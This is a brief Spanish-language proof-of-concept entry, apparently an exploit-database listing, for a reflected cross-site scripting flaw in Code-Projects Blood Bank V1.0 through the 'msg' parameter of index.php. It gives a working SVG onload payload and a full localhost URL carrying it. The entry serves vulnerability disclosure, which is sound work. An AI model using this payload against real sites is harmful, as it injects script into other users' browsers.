
Exploit de prueba de concepto para cross-site scripting reflejado (XSS) en Code-Projects Blood Bank V1.0 a través del parámetro 'msg' en index.php, con demostración de carga útil.
<div><svg/onload=alert(document.domain)>http://localhost/bloodbank/index.php?msg=<div><svg/onload=alert(document.domain)>